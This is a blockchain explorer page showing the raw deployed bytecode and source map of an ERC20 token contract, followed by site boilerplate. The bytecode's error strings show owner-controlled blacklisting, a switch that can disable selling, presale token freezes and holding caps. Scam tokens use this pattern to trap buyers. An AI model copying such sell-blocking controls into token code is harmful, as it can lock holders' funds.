0565b6001600160a01b0381166108745760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161077e565b61062081610c7b565b6001600160a01b0383166108df5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161077e565b6001600160a01b0382166109405760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161077e565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6005546001600160a01b031633146106d65760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161077e565b5f610a0584846107dd565b90505f198114610a6c5781811015610a5f5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604482015260640161077e565b610a6c848484840361087d565b50505050565b6008546301000000900460ff168015610a9957506006546001600160a01b03838116911614155b15610b30575f606460095483610aaf919061149f565b610ab991906114b6565b90505f6064600a5484610acc919061149f565b610ad691906114b6565b90505f610ae383856114d5565b90505f610af083836114d5565b9050610b1287600860049054906101000a90046001600160a01b031686610ccc565b610b1c8784610b40565b610b27878783610ccc565b50505050505050565b610b3b838383610ccc565b505050565b6001600160a01b038216610ba05760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b606482015260840161077e565b610bab825f83610e79565b6001600160a01b0382165f9081526020819052604090205481811015610c1e5760405162461bcd60e51b815260206004820152602260248201527f45524332303a206275726e20616d6f756e7420657863656564732062616c616e604482015261636560f01b606482015260840161077e565b6001600160a01b0383165f818152602081815260408083208686039055600280548790039055518581529192917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3505050565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b6001600160a01b038316610d305760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161077e565b6001600160a01b038216610d925760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161077e565b610d9d838383610e79565b6001600160a01b0383165f9081526020819052604090205481811015610e145760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840161077e565b6001600160a01b038481165f81815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3610a6c565b6001600160a01b0382165f908152600b602052604090205460ff16158015610eb957506001600160a01b0383165f908152600b602052604090205460ff16155b610ef35760405162461bcd60e51b815260206004820152600b60248201526a109b1858dadb1a5cdd195960aa1b604482015260640161077e565b60085460ff16610f68576005546001600160a01b0384811691161480610f2657506005546001600160a01b038381169116145b610b3b5760405162461bcd60e51b8152602060048201526013602482015272151c98591a5b99c81b9bdd08195b98589b1959606a1b604482015260640161077e565b600854610100900460ff1680610f8c57506006546001600160a01b03838116911614155b610fce5760405162461bcd60e51b815260206004820152601360248201527214d95b1b1a5b99c81b9bdd08195b98589b1959606a1b604482015260640161077e565b60085462010000900460ff168015610ff357506006546001600160a01b038481169116145b15611072576007548161101a846001600160a01b03165f9081526020819052604090205490565b611024919061148c565b11156110725760405162461bcd60e51b815260206004820152601b60248201527f4d617820686f6c64696e6720616d6f756e742065786365656465640000000000604482015260640161077e565b600e5460ff16801561109157506006546001600160a01b038381169116145b1561116a57600d54600c546040516370a0823160e01b81526001600160a01b038681166004830152909116906370a0823190602401602060405180830381865afa1580156110e1573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061110591906114e8565b101561116a5760405162461bcd60e51b815260206004820152602e60248201527f496e73756666696369656e742046696e616c652062616c616e636520696e207760448201526d30b63632ba103a379039b2b6361760911b606482015260840161077e565b60105460ff16801561119257506001600160a01b0383165f908152600f602052604090205415155b15610b3b576001600160a01b0383165f908152600f602090815260408083205491839052909120546111c59083906114d5565b1015610b3b5760405162461bcd60e51b8152602060048201526024808201527f50726573616c6520746f6b656e73206172652063757272656e746c792066726f6044820152633d32b71760e11b606482015260840161077e565b5f6020808352835180828501525f5b8181101561124a5785810183015185820160400152820161122e565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114611280575f80fd5b919050565b5f8060408385031215611296575f80fd5b61129f8361126a565b946020939093013593505050565b80358015158114611280575f80fd5b5f80604083850312156112cd575f80fd5b6112d68361126a565b91506112e4602084016112ad565b90509250929050565b5f805f606084860312156112ff575f80fd5b6113088461126a565b92506113166020850161126a565b9150604084013590509250925092565b5f60208284031215611336575f80fd5b61133f8261126a565b9392505050565b5f60208284031215611356575f80fd5b5035919050565b5f805f805f60a08688031215611371575f80fd5b61137a866112ad565b9450611388602087016112ad565b9350611396604087016112ad565b92506113a4606087016112ad565b91506113b2608087016112ad565b90509295509295909350565b5f602082840312156113ce575f80fd5b61133f826112ad565b5f80604083850312156113e8575f80fd5b50508035926020909101359150565b5f8060408385031215611408575f80fd5b823591506112e46020840161126a565b5f8060408385031215611429575f80fd5b6114328361126a565b91506112e46020840161126a565b600181811c9082168061145457607f821691505b60208210810361147257634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b8082018082111561059a5761059a611478565b808202811582820484141761059a5761059a611478565b5f826114d057634e487b7160e01b5f52601260045260245ffd5b500490565b8181038181111561059a5761059a611478565b5f602082840312156114f8575f80fd5b505191905056fea2646970667358221220acce4b68fa06e50f63034e43ad0bfa6848d4cf759c46141d671d1341bade6b5464736f6c63430008150033

Deployed Bytecode Sourcemap

3881:9831:8:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2133:98:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4410:197;;;;;;:::i;:::-;;:::i;:::-;;;1169:14:9;;1162:22;1144:41;;1132:2;1117:18;4410:197:1;1004:187:9;9290:133:8;;;;;;:::i;:::-;;:::i;:::-;;3221:106:1;3308:12;;3221:106;;;1766:25:9;;;1754:2;1739:18;3221:106:1;1620:177:9;5169:286:1;;;;;;:::i;:::-;;:::i;4951:55:8:-;;;;;;:::i;:::-;;;;;;;;;;;;;;4807:34;;;;;;4507:26;;;;;;3070:91:1;;;3152:2;2468:36:9;;2456:2;2441:18;3070:91:1;2326:184:9;5850:234:1;;;;;;:::i;:::-;;:::i;9429:108:8:-;;;;;;:::i;:::-;;:::i;5067:36::-;;;;;;;;;9543:506;;;;;;:::i;:::-;;:::i;10561:161::-;;;;;;:::i;:::-;;:::i;10728:130::-;;;;;;:::i;:::-;;:::i;3385:125:1:-;;;;;;:::i;:::-;-1:-1:-1;;;;;3485:18:1;3459:7;3485:18;;;;;;;;;;;;3385:125;1824:101:7;;;:::i;4251:27:8:-;;;;;;;;;;;;4064:31;;;;;;4701:73;;;;;-1:-1:-1;;;;;4701:73:8;;;;;;-1:-1:-1;;;;;3323:32:9;;;3305:51;;3293:2;3278:18;4701:73:8;3159:203:9;1194:85:7;1266:6;;-1:-1:-1;;;;;1266:6:7;1194:85;;2344:102:1;;;:::i;10944:129:8:-;;;;;;:::i;:::-;;:::i;10055:278::-;;;;;;:::i;:::-;;:::i;6571:427:1:-;;;;;;:::i;:::-;;:::i;4039:19:8:-;;;;;-1:-1:-1;;;;;4039:19:8;;;3706:189:1;;;;;;:::i;:::-;;:::i;10339:216:8:-;;;;;;:::i;:::-;;:::i;3953:149:1:-;;;;;;:::i;:::-;;:::i;4189:29:8:-;;;;;;;;;;;;4874:39;;;;;;;;;4377:69;;;;;;;;-1:-1:-1;;;;;4377:69:8;;;2074:198:7;;;;;;:::i;:::-;;:::i;4626:41:8:-;;;;;;:::i;:::-;;;;;;;;;;;;;;;;4311:32;;;;;;;;;;;;4566:26;;;;;;4128:28;;;;;;;;;2133:98:1;2187:13;2219:5;2212:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2133:98;:::o;4410:197::-;4493:4;719:10:0;4547:32:1;719:10:0;4563:7:1;4572:6;4547:8;:32::i;:::-;4596:4;4589:11;;;4410:197;;;;;:::o;9290:133:8:-;1087:13:7;:11;:13::i;:::-;-1:-1:-1;;;;;9380:19:8;;;::::1;;::::0;;;:9:::1;:19;::::0;;;;:36;;-1:-1:-1;;9380:36:8::1;::::0;::::1;;::::0;;;::::1;::::0;;9290:133::o;5169:286:1:-;5296:4;719:10:0;5352:38:1;5368:4;719:10:0;5383:6:1;5352:15;:38::i;:::-;5400:27;5410:4;5416:2;5420:6;5400:9;:27::i;:::-;-1:-1:-1;5444:4:1;;5169:286;-1:-1:-1;;;;5169:286:1:o;5850:234::-;5938:4;719:10:0;5992:64:1;719:10:0;6008:7:1;6045:10;6017:25;719:10:0;6008:7:1;6017:9;:25::i;:::-;:38;;;;:::i;:::-;5992:8;:64::i;9429:108:8:-;9478:25;9484:10;9496:6;9478:5;:25::i;:::-;9429:108;:::o;9543:506::-;1087:13:7;:11;:13::i;:::-;9733:9:8::1;:22:::0;;-1:-1:-1;;9792:22:8;9733;::::1;;-1:-1:-1::0;;9792:22:8;;;;;9733::::1;9792::::0;::::1;;::::0;;;::::1;::::0;;;::::1;-1:-1:-1::0;;9906:30:8;9851:18;;::::1;;::::0;;;::::1;-1:-1:-1::0;;9906:30:8;;;;;;;::::1;;::::0;;;::::1;;::::0;;;9973:19:::1;:42:::0;;-1:-1:-1;;9973:42:8::1;::::0;::::1;;::::0;;;::::1;::::0;;9543:506::o;10561:161::-;1087:13:7;:11;:13::i;:::-;10658::8::1;:30:::0;;-1:-1:-1;;;;;;10658:30:8::1;-1:-1:-1::0;;;;;10658:30:8;;;::::1;::::0;;;::::1;::::0;;10561:161::o;10728:130::-;1087:13:7;:11;:13::i;:::-;10806:7:8::1;:18:::0;10728:130::o;1824:101:7:-;1087:13;:11;:13::i;:::-;1888:30:::1;1915:1;1888:18;:30::i;:::-;1824:101::o:0;2344:102:1:-;2400:13;2432:7;2425:14;;;;;:::i;10944:129:8:-;1087:13:7;:11;:13::i;:::-;11028:17:8::1;:38:::0;;-1:-1:-1;;11028:38:8::1;::::0;::::1;;::::0;;;::::1;::::0;;10944:129::o;10055:278::-;1087:13:7;:11;:13::i;:::-;10184:16:8::1;:36:::0;;;;10257:19:::1;:42:::0;10055:278::o;6571:427:1:-;6664:4;719:10:0;6664:4:1;6745:25;719:10:0;6762:7:1;6745:9;:25::i;:::-;6718:52;;6808:15;6788:16;:35;;6780:85;;;;-1:-1:-1;;;6780:85:1;;5178:2:9;6780:85:1;;;5160:21:9;5217:2;5197:18;;;5190:30;5256:34;5236:18;;;5229:62;-1:-1:-1;;;5307:18:9;;;5300:35;5352:19;;6780:85:1;;;;;;;;;6899:60;6908:5;6915:7;6943:15;6924:16;:34;6899:8;:60::i;3706:189::-;3785:4;719:10:0;3839:28:1;719:10:0;3856:2:1;3860:6;3839:9;:28::i;10339:216:8:-;1087:13:7;:11;:13::i;:::-;10444:7:8::1;:18:::0;;;;10499:9:::1;:22:::0;;-1:-1:-1;;;;;10499:22:8;;::::1;::::0;::::1;-1:-1:-1::0;;;;;;10499:22:8;;::::1;::::0;;;::::1;::::0;;10339:216::o;3953:149:1:-;-1:-1:-1;;;;;4068:18:1;;;4042:7;4068:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;3953:149::o;2074:198:7:-;1087:13;:11;:13::i;:::-;-1:-1:-1;;;;;2162:22:7;::::1;2154:73;;;::::0;-1:-1:-1;;;2154:73:7;;5584:2:9;2154:73:7::1;::::0;::::1;5566:21:9::0;5623:2;5603:18;;;5596:30;5662:34;5642:18;;;5635:62;-1:-1:-1;;;5713:18:9;;;5706:36;5759:19;;2154:73:7::1;5382:402:9::0;2154:73:7::1;2237:28;2256:8;2237:18;:28::i;10483:370:1:-:0;-1:-1:-1;;;;;10614:19:1;;10606:68;;;;-1:-1:-1;;;10606:68:1;;5991:2:9;10606:68:1;;;5973:21:9;6030:2;6010:18;;;6003:30;6069:34;6049:18;;;6042:62;-1:-1:-1;;;6120:18:9;;;6113:34;6164:19;;10606:68:1;5789:400:9;10606:68:1;-1:-1:-1;;;;;10692:21:1;;10684:68;;;;-1:-1:-1;;;10684:68:1;;6396:2:9;10684:68:1;;;6378:21:9;6435:2;6415:18;;;6408:30;6474:34;6454:18;;;6447:62;-1:-1:-1;;;6525:18:9;;;6518:32;6567:19;;10684:68:1;6194:398:9;10684:68:1;-1:-1:-1;;;;;10763:18:1;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;10814:32;;1766:25:9;;;10814:32:1;;1739:18:9;10814:32:1;;;;;;;10483:370;;;:::o;1352:130:7:-;1266:6;;-1:-1:-1;;;;;1266:6:7;719:10:0;1415:23:7;1407:68;;;;-1:-1:-1;;;1407:68:7;;6799:2:9;1407:68:7;;;6781:21:9;;;6818:18;;;6811:30;6877:34;6857:18;;;6850:62;6929:18;;1407:68:7;6597:356:9;11134:441:1;11264:24;11291:25;11301:5;11308:7;11291:9;:25::i;:::-;11264:52;;-1:-1:-1;;11330:16:1;:37;11326:243;;11411:6;11391:16;:26;;11383:68;;;;-1:-1:-1;;;11383:68:1;;7160:2:9;11383:68:1;;;7142:21:9;7199:2;7179:18;;;7172:30;7238:31;7218:18;;;7211:59;7287:18;;11383:68:1;6958:353:9;11383:68:1;11493:51;11502:5;11509:7;11537:6;11518:16;:25;11493:8;:51::i;:::-;11254:321;11134:441;;;:::o;12878:832:8:-;12988:13;;;;;;;:34;;;;-1:-1:-1;13018:4:8;;-1:-1:-1;;;;;13005:17:8;;;13018:4;;13005:17;;12988:34;12984:720;;;13038:17;13079:3;13068:7;;13059:6;:16;;;;:::i;:::-;13058:24;;;;:::i;:::-;13038:44;;13123:18;13165:3;13154:7;;13145:6;:16;;;;:::i;:::-;13144:24;;;;:::i;:::-;13123:45;-1:-1:-1;13210:22:8;13235:18;13244:9;13235:6;:18;:::i;:::-;13210:43;-1:-1:-1;13294:23:8;13320:27;13337:10;13210:43;13320:27;:::i;:::-;13294:53;;13389:45;13405:6;13413:9;;;;;;;;;-1:-1:-1;;;;;13413:9:8;13424;13389:15;:45::i;:::-;13475:25;13481:6;13489:10;13475:5;:25::i;:::-;13515:51;13531:6;13539:9;13550:15;13515;:51::i;:::-;13024:580;;;;12878:832;;;:::o;12984:720::-;13624:42;13640:6;13648:9;13659:6;13624:15;:42::i;:::-;12878:832;;;:::o;9401:659:1:-;-1:-1:-1;;;;;9484:21:1;;9476:67;;;;-1:-1:-1;;;9476:67:1;;8046:2:9;9476:67:1;;;8028:21:9;8085:2;8065:18;;;8058:30;8124:34;8104:18;;;8097:62;-1:-1:-1;;;8175:18:9;;;8168:31;8216:19;;9476:67:1;7844:397:9;9476:67:1;9554:49;9575:7;9592:1;9596:6;9554:20;:49::i;:::-;-1:-1:-1;;;;;9639:18:1;;9614:22;9639:18;;;;;;;;;;;9675:24;;;;9667:71;;;;-1:-1:-1;;;9667:71:1;;8448:2:9;9667:71:1;;;8430:21:9;8487:2;8467:18;;;8460:30;8526:34;8506:18;;;8499:62;-1:-1:-1;;;8577:18:9;;;8570:32;8619:19;;9667:71:1;8246:398:9;9667:71:1;-1:-1:-1;;;;;9772:18:1;;:9;:18;;;;;;;;;;;9793:23;;;9772:44;;9909:12;:22;;;;;;;9957:37;1766:25:9;;;9772:9:1;;:18;9957:37;;1739:18:9;9957:37:1;;;;;;;12878:832:8;;;:::o;2426:187:7:-;2518:6;;;-1:-1:-1;;;;;2534:17:7;;;-1:-1:-1;;;;;;2534:17:7;;;;;;;2566:40;;2518:6;;;2534:17;2518:6;;2566:40;;2499:16;;2566:40;2489:124;2426:187;:::o;7452:818:1:-;-1:-1:-1;;;;;7578:18:1;;7570:68;;;;-1:-1:-1;;;7570:68:1;;8851:2:9;7570:68:1;;;8833:21:9;8890:2;8870:18;;;8863:30;8929:34;8909:18;;;8902:62;-1:-1:-1;;;8980:18:9;;;8973:35;9025:19;;7570:68:1;8649:401:9;7570:68:1;-1:-1:-1;;;;;7656:16:1;;7648:64;;;;-1:-1:-1;;;7648:64:1;;9257:2:9;7648:64:1;;;9239:21:9;9296:2;9276:18;;;9269:30;9335:34;9315:18;;;9308:62;-1:-1:-1;;;9386:18:9;;;9379:33;9429:19;;7648:64:1;9055:399:9;7648:64:1;7723:38;7744:4;7750:2;7754:6;7723:20;:38::i;:::-;-1:-1:-1;;;;;7794:15:1;;7772:19;7794:15;;;;;;;;;;;7827:21;;;;7819:72;;;;-1:-1:-1;;;7819:72:1;;9661:2:9;7819:72:1;;;9643:21:9;9700:2;9680:18;;;9673:30;9739:34;9719:18;;;9712:62;-1:-1:-1;;;9790:18:9;;;9783:36;9836:19;;7819:72:1;9459:402:9;7819:72:1;-1:-1:-1;;;;;7925:15:1;;;:9;:15;;;;;;;;;;;7943:20;;;7925:38;;8140:13;;;;;;;;;;:23;;;;;;8189:26;;1766:25:9;;;8140:13:1;;8189:26;;1739:18:9;8189:26:1;;;;;;;8226:37;12878:832:8;11184:1688;-1:-1:-1;;;;;11360:13:8;;;;;;:9;:13;;;;;;;;11359:14;:34;;;;-1:-1:-1;;;;;;11378:15:8;;;;;;:9;:15;;;;;;;;11377:16;11359:34;11351:58;;;;-1:-1:-1;;;11351:58:8;;10068:2:9;11351:58:8;;;10050:21:9;10107:2;10087:18;;;10080:30;-1:-1:-1;;;10126:18:9;;;10119:41;10177:18;;11351:58:8;9866:335:9;11351:58:8;11513:9;;;;11508:1358;;1266:6:7;;-1:-1:-1;;;;;11546:15:8;;;1266:6:7;;11546:15:8;;:32;;-1:-1:-1;1266:6:7;;-1:-1:-1;;;;;11565:13:8;;;1266:6:7;;11565:13:8;11546:32;11538:64;;;;-1:-1:-1;;;11538:64:8;;10408:2:9;11538:64:8;;;10390:21:9;10447:2;10427:18;;;10420:30;-1:-1:-1;;;10466:18:9;;;10459:49;10525:18;;11538:64:8;10206:343:9;11508:1358:8;11725:9;;;;;;;;:23;;-1:-1:-1;11744:4:8;;-1:-1:-1;;;;;11738:10:8;;;11744:4;;11738:10;;11725:23;11717:55;;;;-1:-1:-1;;;11717:55:8;;10756:2:9;11717:55:8;;;10738:21:9;10795:2;10775:18;;;10768:30;-1:-1:-1;;;10814:18:9;;;10807:49;10873:18;;11717:55:8;10554:343:9;11717:55:8;11915:7;;;;;;;:23;;;;-1:-1:-1;11934:4:8;;-1:-1:-1;;;;;11926:12:8;;;11934:4;;11926:12;11915:23;11911:208;;;12019:16;;12009:6;11987:19;12003:2;-1:-1:-1;;;;;3485:18:1;3459:7;3485:18;;;;;;;;;;;;3385:125;11987:19:8;:28;;;;:::i;:::-;:48;;11958:146;;;;-1:-1:-1;;;11958:146:8;;11104:2:9;11958:146:8;;;11086:21:9;11143:2;11123:18;;;11116:30;11182:29;11162:18;;;11155:57;11229:18;;11958:146:8;10902:351:9;11958:146:8;12253:19;;;;:33;;;;-1:-1:-1;12282:4:8;;-1:-1:-1;;;;;12276:10:8;;;12282:4;;12276:10;12253:33;12249:229;;;12376:19;;12342:13;;12335:37;;-1:-1:-1;;;12335:37:8;;-1:-1:-1;;;;;3323:32:9;;;12335:37:8;;;3305:51:9;12342:13:8;;;;12335:31;;3278:18:9;;12335:37:8;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;:60;;12306:157;;;;-1:-1:-1;;;12306:157:8;;11649:2:9;12306:157:8;;;11631:21:9;11688:2;11668:18;;;11661:30;11727:34;11707:18;;;11700:62;-1:-1:-1;;;11778:18:9;;;11771:44;11832:19;;12306:157:8;11447:410:9;12306:157:8;12603:17;;;;:51;;;;-1:-1:-1;;;;;;12624:26:8;;12653:1;12624:26;;;:20;:26;;;;;;:30;;12603:51;12599:257;;;-1:-1:-1;;;;;12737:26:8;;;;;;:20;:26;;;;;;;;;3485:18:1;;;;;;;;12703:30:8;;12727:6;;12703:30;:::i;:::-;:60;;12674:167;;;;-1:-1:-1;;;12674:167:8;;12064:2:9;12674:167:8;;;12046:21:9;12103:2;12083:18;;;12076:30;12142:34;12122:18;;;12115:62;-1:-1:-1;;;12193:18:9;;;12186:34;12237:19;;12674:167:8;11862:400:9;14:548;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:9;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:9:o;1196:160::-;1261:20;;1317:13;;1310:21;1300:32;;1290:60;;1346:1;1343;1336:12;1361:254;1426:6;1434;1487:2;1475:9;1466:7;1462:23;1458:32;1455:52;;;1503:1;1500;1493:12;1455:52;1526:29;1545:9;1526:29;:::i;:::-;1516:39;;1574:35;1605:2;1594:9;1590:18;1574:35;:::i;:::-;1564:45;;1361:254;;;;;:::o;1802:328::-;1879:6;1887;1895;1948:2;1936:9;1927:7;1923:23;1919:32;1916:52;;;1964:1;1961;1954:12;1916:52;1987:29;2006:9;1987:29;:::i;:::-;1977:39;;2035:38;2069:2;2058:9;2054:18;2035:38;:::i;:::-;2025:48;;2120:2;2109:9;2105:18;2092:32;2082:42;;1802:328;;;;;:::o;2135:186::-;2194:6;2247:2;2235:9;2226:7;2222:23;2218:32;2215:52;;;2263:1;2260;2253:12;2215:52;2286:29;2305:9;2286:29;:::i;:::-;2276:39;2135:186;-1:-1:-1;;;2135:186:9:o;2515:180::-;2574:6;2627:2;2615:9;2606:7;2602:23;2598:32;2595:52;;;2643:1;2640;2633:12;2595:52;-1:-1:-1;2666:23:9;;2515:180;-1:-1:-1;2515:180:9:o;2700:454::-;2780:6;2788;2796;2804;2812;2865:3;2853:9;2844:7;2840:23;2836:33;2833:53;;;2882:1;2879;2872:12;2833:53;2905:26;2921:9;2905:26;:::i;:::-;2895:36;;2950:35;2981:2;2970:9;2966:18;2950:35;:::i;:::-;2940:45;;3004:35;3035:2;3024:9;3020:18;3004:35;:::i;:::-;2994:45;;3058:35;3089:2;3078:9;3074:18;3058:35;:::i;:::-;3048:45;;3112:36;3143:3;3132:9;3128:19;3112:36;:::i;:::-;3102:46;;2700:454;;;;;;;;:::o;3367:180::-;3423:6;3476:2;3464:9;3455:7;3451:23;3447:32;3444:52;;;3492:1;3489;3482:12;3444:52;3515:26;3531:9;3515:26;:::i;3552:248::-;3620:6;3628;3681:2;3669:9;3660:7;3656:23;3652:32;3649:52;;;3697:1;3694;3687:12;3649:52;-1:-1:-1;;3720:23:9;;;3790:2;3775:18;;;3762:32;;-1:-1:-1;3552:248:9:o;3805:254::-;3873:6;3881;3934:2;3922:9;3913:7;3909:23;3905:32;3902:52;;;3950:1;3947;3940:12;3902:52;3986:9;3973:23;3963:33;;4015:38;4049:2;4038:9;4034:18;4015:38;:::i;4064:260::-;4132:6;4140;4193:2;4181:9;4172:7;4168:23;4164:32;4161:52;;;4209:1;4206;4199:12;4161:52;4232:29;4251:9;4232:29;:::i;:::-;4222:39;;4280:38;4314:2;4303:9;4299:18;4280:38;:::i;4329:380::-;4408:1;4404:12;;;;4451;;;4472:61;;4526:4;4518:6;4514:17;4504:27;;4472:61;4579:2;4571:6;4568:14;4548:18;4545:38;4542:161;;4625:10;4620:3;4616:20;4613:1;4606:31;4660:4;4657:1;4650:15;4688:4;4685:1;4678:15;4542:161;;4329:380;;;:::o;4714:127::-;4775:10;4770:3;4766:20;4763:1;4756:31;4806:4;4803:1;4796:15;4830:4;4827:1;4820:15;4846:125;4911:9;;;4932:10;;;4929:36;;;4945:18;;:::i;7316:168::-;7389:9;;;7420;;7437:15;;;7431:22;;7417:37;7407:71;;7458:18;;:::i;7489:217::-;7529:1;7555;7545:132;;7599:10;7594:3;7590:20;7587:1;7580:31;7634:4;7631:1;7624:15;7662:4;7659:1;7652:15;7545:132;-1:-1:-1;7691:9:9;;7489:217::o;7711:128::-;7778:9;;;7799:11;;;7796:37;;;7813:18;;:::i;11258:184::-;11328:6;11381:2;11369:9;11360:7;11356:23;11352:32;11349:52;;;11397:1;11394;11387:12;11349:52;-1:-1:-1;11420:16:9;;11258:184;-1:-1:-1;11258:184:9:o

Swarm Source

ipfs://acce4b68fa06e50f63034e43ad0bfa6848d4cf759c46141d671d1341bade6b54
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.